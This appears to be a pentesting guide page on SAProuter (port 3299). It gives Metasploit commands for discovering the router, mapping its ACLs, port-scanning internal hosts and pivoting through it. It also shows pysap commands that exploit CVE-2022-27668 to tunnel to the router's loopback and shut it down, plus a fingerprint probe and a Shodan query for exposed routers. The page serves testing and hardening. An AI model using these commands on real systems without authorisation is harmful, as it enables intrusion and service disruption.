# 3299/tcp - Pentesting SAProuter

PORT     STATE SERVICE    VERSION
3299/tcp open  saprouter?

This is a summary of the post from https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/

Understanding SAProuter Penetration with Metasploit

SAProuter acts as a reverse proxy for SAP systems, primarily to control access between the internet and internal SAP networks. It's commonly exposed to the internet by allowing TCP port 3299 through organizational firewalls. This setup makes SAProuter an attractive target for penetration testing because it might serve as a gateway to high-value internal networks.

Scanning and Information Gathering

Initially, a scan is performed to identify if a SAP router is running on a given IP using the sap_service_discovery module. This step is crucial for establishing the presence of a SAP router and its open port.

msf> use auxiliary/scanner/sap/sap_service_discovery
msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101
msf auxiliary(sap_service_discovery) > run

Following the discovery, further investigation into the SAP router's configuration is carried out with the sap_router_info_request module to potentially reveal internal network details.

msf auxiliary(sap_router_info_request) > use auxiliary/scanner/sap/sap_router_info_request
msf auxiliary(sap_router_info_request) > set RHOSTS 1.2.3.101
msf auxiliary(sap_router_info_request) > run

Enumerating Internal Services

With obtained internal network insights, the sap_router_portscanner module is used to probe internal hosts and services through the SAProuter, allowing a deeper understanding of internal networks and service configurations.

msf auxiliary(sap_router_portscanner) > set INSTANCES 00-50
msf auxiliary(sap_router_portscanner) > set PORTS 32NN

This module's flexibility in targeting specific SAP instances and ports makes it an effective tool for detailed internal network exploration.

Advanced Enumeration and ACL Mapping

Further scanning can reveal how Access Control Lists (ACLs) are configured on the SAProuter, detailing which connections are allowed or blocked. This information is pivotal in understanding security policies and potential vulnerabilities.

msf auxiliary(sap_router_portscanner) > set MODE TCP
msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN

Blind Enumeration of Internal Hosts

In scenarios where direct information from the SAProuter is limited, techniques like blind enumeration can be applied. This approach attempts to guess and verify the existence of internal hostnames, revealing potential targets without direct IP addresses.

Leveraging Information for Penetration Testing

Having mapped the network and identified accessible services, penetration testers can utilize Metasploit's proxy capabilities to pivot through the SAProuter for further exploration and exploitation of internal SAP services.

msf auxiliary(sap_hostctrl_getcomputersystem) > set Proxies sapni:1.2.3.101:3299
msf auxiliary(sap_hostctrl_getcomputersystem) > set RHOSTS 192.168.1.18
msf auxiliary(sap_hostctrl_getcomputersystem) > run

Conclusion

This approach underscores the importance of secure SAProuter configurations and highlights the potential for accessing internal networks through targeted penetration testing. Properly securing SAP routers and understanding their role in network security architecture is crucial for protecting against unauthorized access.

For more detailed information on Metasploit modules and their usage, visit Rapid7's database.

Recent Vulnerabilities (2022-2025)

CVE-2022-27668 – Improper Access Control ➜ Remote Administrative Command Execution

In June 2022 SAP released Security Note 3158375 addressing a critical flaw (CVSS 9.8) in SAProuter (all kernels ≥ 7.22). An unauthenticated attacker can abuse permissive saprouttab entries to send administration packets (e.g. shutdown, trace-level, connection-kill) from a remote host, even when the router was started without the -X remote-admin option.

The issue results from the possibility to build a tunnel to the router’s own loopback interface by targeting the unspecified address 0.0.0.0. Once the tunnel is established, the attacker gains local-host privileges and can run any admin command.

Practical exploitation can be reproduced with the pysap framework:

# 1. Build a loopback tunnel through the vulnerable SAProuter
python router_portfw.py -d <ROUTER_IP> -p 3299 \
                        -t 0.0.0.0    -r 3299 \
                        -a 127.0.0.1  -l 3299 -v

# 2. Send an admin packet (here: stop the remote router)
python router_admin.py -s -d 127.0.0.1 -p 3299

Affected versions

• Stand-alone SAProuter 7.22 / 7.53
• Kernel 7.49, 7.77, 7.81, 7.85–7.88 (incl. KRNL64NUC/UC)

Fix / Mitigation

1. Apply the patch delivered with SAP Note 3158375.
2. Remove wildcard (*) targets from P and S lines in saprouttab.
3. Make sure the router is started without the -X option and is not directly exposed to the Internet.

Updated Tooling & Tricks

• pysap – actively maintained and provides router_portfw.py, router_admin.py & router_trace.py for crafting custom NI/Router packets, fuzzing ACLs or automating the CVE-2022-27668 exploit.

• Nmap – extend service detection by adding the custom SAProuter probe:

  Probe TCP SAProuter q|\x00\x00\x00\x00|
  ports 3299
  match saprouter m|SAProuter ([\d.]+)| p/SAProuter/ v/$1/
  

  Combine with NSE scripts or --script=banner to quickly fingerprint versions that leak the banner string (SAProuter <ver> on '<host>').

• Metasploit – the auxiliary modules shown above still work through a SOCKS or NI proxy created with pysap, enabling full framework integration even when the router blocks direct access.

Hardening & Detection Checklist

• Filter port 3299/TCP on the perimeter firewall – allow traffic only from trusted SAP support networks.
• Keep SAProuter fully patched; verify with saprouter -v and compare against the latest kernel patch level.
• Use strict, host-specific entries in saprouttab; avoid * wildcards and deny P/S rules that target arbitrary hosts or ports.
• Start the service with -S <secudir> + SNC to enforce encryption and mutual authentication.
• Disable remote administration (-X) and, if possible, bind the listener to 127.0.0.1 while using an external reverse proxy for required traffic.
• Monitor the dev_rout log for suspicious ROUTER_ADM packets or unexpected NI_ROUTE requests to 0.0.0.0.

References

• https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/
• https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/

Shodan

• port:3299 !HTTP Network packet too big